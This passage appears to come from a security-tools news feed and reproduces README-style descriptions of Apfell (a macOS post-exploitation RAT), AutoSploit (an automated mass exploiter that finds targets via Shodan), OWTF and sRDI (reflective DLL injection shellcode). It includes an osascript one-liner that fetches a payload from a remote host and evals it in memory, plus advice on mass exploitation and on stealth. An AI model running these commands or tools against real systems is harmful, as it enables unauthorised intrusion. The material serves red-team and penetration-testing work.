        protocol = request.transport._protocol

Usage

Start the server:

    python3 server.py
    [2018-07-16 14:39:14 -0700] [28381] [INFO] Goin' Fast @ https://0.0.0.0:443

By default, the server will bind to 0.0.0.0 on port 443. This is an alias meaning that it will be listening on all IPv4 addresses on the machine. You don't actually browse to https://0.0.0.0:443 in your browser. Instead, you'll browse to either https://localhost:443 if you're on the same machine that's running the server, or to any of the IPv4 addresses on the machine that's running the server. You could also browse to the IP address you specified in server_ip = '192.168.0.119' in the installation section.

Browse to the server with any modern web browser, create a new user, and create a new payload.

Use the attacks_api to host the new file (this will eventually get updated with a GUI):

    # assuming we created a payload in our local '/tmp' directory
    curl -X POST -d '{"port":8080, "directory":"/tmp"}' https://192.168.0.119/api/v1.0/attacks/host_file

This will start a Python simple web server in the /tmp directory on port 8080.

Pull down and execute the payload in memory:

    osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('HTTP://192.168.0.119:8080/apfell-jxa')),$.NSUTF8StringEncoding)));"

Interact with the new RAT.

Download Apfell

Link: http://feedproxy.google.com/~r/PentestTools/~3/9wqU15O2-l4/apfell-macos-post-exploit-red-teaming.html

AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is startedOperational Security ConsiderationReceiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.Helpful linksUsageInstallingDependenciesUser Manual Extensive usage breakdownScreenshotsReporting bugs/ideasDevelopment guidelinesShoutoutsDevelopmentDiscord serverREADME translationsInstallationInstalling AutoSploit is very simple, you can find the latest stable release here. 
You can also download the master branch as a zip or tarball or follow one of the below methods;Cloningsudo -s << EOFgit clone https://github.com/NullArray/Autosploit.gitcd AutoSploitchmod +x install.sh./install.shpython2 autosploit.pyEOFDockersudo -s << EOFgit clone https://github.com/NullArray/AutoSploit.gitcd AutoSploitchmod +x install.sh./installshcd AutoSploit/Dockerdocker network create -d bridge haknetdocker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgresdocker build -t autosploit .docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploitEOFOn any Linux system the following should work;git clone https://github.com/NullArray/AutoSploitcd AutoSploitchmod +x install.sh./install.shIf you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;sudo -s << '_EOF'pip2 install virtualenv --usergit clone https://github.com/NullArray/AutoSploit.gitvirtualenv <PATH-TO-YOUR-ENV>source <PATH-TO-YOUR-ENV>/bin/activatecd <PATH-TO-AUTOSPLOIT>pip2 install -r requirements.txtchmod +x install.sh./install.shpython autosploit.py_EOFMore information on running Docker can be found hereUsageStarting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.1. Usage And Legal2. Gather Hosts3. Custom Hosts4. Add Single Host5. View Gathered Hosts6. Exploit Gathered Hosts99. QuitChoosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you. 
I've posted the options below as well for reference.

usage: python autosploit.py -[c|z|s|a] -[q] QUERY
                            [-C] WORKSPACE LHOST LPORT
                            [-e] [--whitewash] PATH
                            [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH
                            [--rand-agent] [--proxy] PROTO://IP:PORT
                            [-P] AGENT

optional arguments:
  -h, --help            show this help message and exit

search engines:
  possible search engines to use

  -c, --censys          use censys.io as the search engine to gather hosts
  -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
  -s, --shodan          use shodan.io as the search engine to gather hosts
  -a, --all             search all available search engines to gather hosts

requests:
  arguments to edit your requests

  --proxy PROTO://IP:PORT
                        run behind a proxy while performing the searches
  --random-agent        use a random HTTP User-Agent header
  -P USER-AGENT, --personal-agent USER-AGENT
                        pass a personal User-Agent to use for HTTP requests
  -q QUERY, --query QUERY
                        pass your search query

exploits:
  arguments to edit your exploits

  -E PATH, --exploit-file PATH
                        provide a text file to convert into JSON and save for later use
  -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT
                        set the configuration for MSF (IE -C default 127.0.0.1 8080)
  -e, --exploit         start exploiting the already gathered hosts

misc arguments:
  arguments that don't fit anywhere else

  --ruby-exec           if you need to run the Ruby executable with MSF use this
  --msf-path MSF-PATH   pass the path to your framework if it is not in your ENV PATH
  --whitelist PATH      only exploit hosts listed in the whitelist file

Dependencies

Note: All dependencies should be installed using the above installation method; however, if you find they are not, AutoSploit depends on the following Python 2.7 modules:

requests
psutil

Should you find you do not have these installed, get them with pip like so:

pip install requests psutil

or

pip install -r requirements.txt

Since the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.

Download AutoSploit v2.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

OWTF v2.4 – Offensive Web Testing Framework

OWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST, so that pentesters will have more time to:

- See the big picture and think out of the box
- More efficiently find, verify and combine vulnerabilities
- Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions
- Perform more tactical/targeted fuzzing on seemingly risky areas
- Demonstrate true impact despite the short timeframes we are typically given to test

The tool is highly configurable and anybody can trivially create simple plugins or add new tests in the configuration files without having any development experience.

Note: This tool is however not a silver bullet and will only be as good as the person using it: understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.

Requirements

OWTF is developed on Kali Linux and macOS, but it is made for Kali Linux (or other Debian derivatives). OWTF supports both Python 2 and Python 3.

Installation

Recommended: using a virtualenv is highly recommended!

pip install git+https://github.com/owtf/owtf#egg=owtf

or clone the repo and

python setup.py install

If you want to change the database password in the Docker Compose setup, edit the environment variables in the docker-compose.yml file. If you prefer to override the environment variables in a .env file, use the file name owtf.env so that Docker Compose knows to include it.

To run OWTF on Windows or macOS, OWTF uses Docker Compose. You need to have Docker Compose installed (check by running docker-compose -v).
After installing Docker Compose, simply run docker-compose up and open localhost:8009 for the OWTF web interface.

Install on OSX

Dependencies: Install Homebrew (https://brew.sh/) and follow the steps given below:

$ virtualenv <venv name>
$ source <venv name>/bin/activate
$ brew install coreutils gnu-sed openssl
# We need to install 'cryptography' first to avoid issues
$ pip install cryptography --global-option=build_ext --global-option="-L/usr/local/opt/openssl/lib" --global-option="-I/usr/local/opt/openssl/include"
$ git clone <this repo>
$ cd owtf
$ python setup.py install
# Run OWTF!
$ owtf

Features

- Resilience: If one tool crashes, OWTF will move on to the next tool/test, saving the partial output of the tool until it crashed.
- Flexible: Pause and resume your work.
- Tests Separation: OWTF separates its traffic to the target into mainly 3 types of plugins:
  - Passive: No traffic goes to the target
  - Semi Passive: Normal traffic to target
  - Active: Direct vulnerability probing
- Extensive REST API.
- Has almost complete OWASP Testing Guide (v3, v4), Top 10, NIST, CWE coverage.
- Web interface: Easily manage large penetration engagements.
- Interactive report:
  - Automated plugin rankings from the tool output, fully configurable by the user.
  - Configurable risk rankings
  - In-line notes editor for each plugin.

Links

Project homepage, IRC, Wiki, Slack (join channel #project-owtf), User Documentation, Youtube channel, Slideshare, Blog.

Screenshots

Download OWTF

Link: http://feedproxy.google.com/~r/PentestTools/~3/QhjPP8mfh-A/owtf-v24-offensive-web-testing-framework.html

sRDI – Shellcode Implementation Of Reflective DLL Injection

sRDI allows for the conversion of DLL files to position independent shellcode. Functionality is accomplished via two components:

- C project which compiles a PE loader implementation (RDI) to shellcode
- Conversion code which attaches the DLL, RDI, and user data together with a bootstrap

This project is comprised of the following elements:

- ShellcodeRDI: Compiles shellcode for the DLL loader
- NativeLoader: Converts DLL to shellcode if necessary, then injects into memory
- DotNetLoader: C# implementation of NativeLoader
- Python\ConvertToShellcode.py: Convert DLL to shellcode in place
- Python\EncodeBlobs.py: Encodes compiled sRDI blobs for static embedding
- PowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in place
- FunctionTest: Imports sRDI C function for debug testing
- TestDLL: Example DLL that includes two exported functions for call on Load and after

The DLL does not need to be compiled with RDI; however, the technique is cross compatible.

Use Cases / Examples

Before use, it is recommended that you become familiar with Reflective DLL Injection and its purpose.

Convert DLL to shellcode using python

from ShellcodeRDI import *
dll = open("TestDLL_x86.dll", 'rb').read()
shellcode = ConvertToShellcode(dll)

Load DLL into memory using C# loader

DotNetLoader.exe TestDLL_x64.dll

Convert DLL with python script and load with Native EXE

python ConvertToShellcode.py TestDLL_x64.dll
NativeLoader.exe TestDLL_x64.bin

Convert DLL with powershell and load with Invoke-Shellcode

Import-Module .\Invoke-Shellcode.ps1
Import-Module .\ConvertTo-Shellcode.ps1
Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)

Stealth Considerations

There are many ways to detect memory injection.
The loader function implements two stealth improvements on traditional RDI:

- Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than a massive RWX blob.
- PE Header Cleaning (Optional): The DOS Header and DOS Stub for the target DLL are completely wiped with null bytes on load (except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/PowerShell.

Building

This project is built using Visual Studio 2015 (v140) and Windows SDK 8.1. The python script is written using Python 3.

The Python and PowerShell scripts are located at:

Python\ConvertToShellcode.py
PowerShell\ConvertTo-Shellcode.ps1

After building the project, the other binaries will be located at:

bin\NativeLoader.exe
bin\DotNetLoader.exe
bin\TestDLL_.dll
bin\ShellcodeRDI_.bin

Download sRDI

Link: http://feedproxy.google.com/~r/PentestTools/~3/L7k0Is7EfEY/srdi-shellcode-implementation-of.html